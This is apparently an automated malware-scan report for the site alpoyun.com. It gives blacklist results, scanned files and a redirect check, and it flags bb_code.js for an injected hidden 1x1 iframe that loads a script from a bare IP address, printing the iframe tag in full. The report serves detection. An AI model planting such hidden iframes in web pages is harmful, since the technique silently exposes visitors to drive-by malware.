Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alpoyun.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alpoyun.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://alpoyun.com/ | 200 OK Content-Length: 26456 Content-Type: text/html | clean |
http://alpoyun.com/js/prototype.js | 200 OK Content-Length: 61894 Content-Type: text/html | clean |
http://alpoyun.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://alpoyun.com/js/slider.js | 200 OK Content-Length: 11283 Content-Type: text/html | clean |
http://alpoyun.com/js/functions.js | 200 OK Content-Length: 1278 Content-Type: text/html | clean |
http://alpoyun.com/js/bb_code.js | 200 OK Content-Length: 4074 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://129.121.35.147/home/index.php <iframe frameborder=0 src="http://129.121.35.147/home/index.php" width=1 height=1 scrolling=no> | ||
http://www.realist.gen.tr/realist.php?id=50003 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 19:59:30 GMT Location: http://reali.st/realist.php?id=50003 Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://reali.st/realist.php?id=50003 | 200 OK Content-Length: 911 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.alpoyun.com function istatistik(){window.open("http://www.realist.gen.tr/istatistik/50003/");} var rt1='<a href=http://www.realist.gen.tr/listele/2/15/eglence-oyun.htm>Eğlence Oyun</a>'; var rt2='<a href=http://www.realist.gen.tr/uyeler/50003/alpoyun-bedava-oyunlar.htm>http://www.alpoyun.com</a>'; var re1="?id=50003"; re1+="&l=12"; re1+="&a=1"; re1+="&ref2=" + escape(document.location); re1+="&referrer=" + escape(document.referrer); re1+="&mwidth=" + screen.width; re1+="&mheight=" + screen.height; re1+="&mcolordepth=" + screen.colorDepth; document.write('<a href="http://www.realist.gen.tr/i/50003/" target="_blank" onclick="istatistik();"><img src= ...[299 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: alpoyun.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Aug 2014 19:59:20 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Ngpass_all: 1
Second query (visit from search engine):
GET / HTTP/1.1
Host: alpoyun.com
Referer: http://www.google.com/search?q=alpoyun.com
Result:
The result is similar to the first query. There are no suspicious redirects found.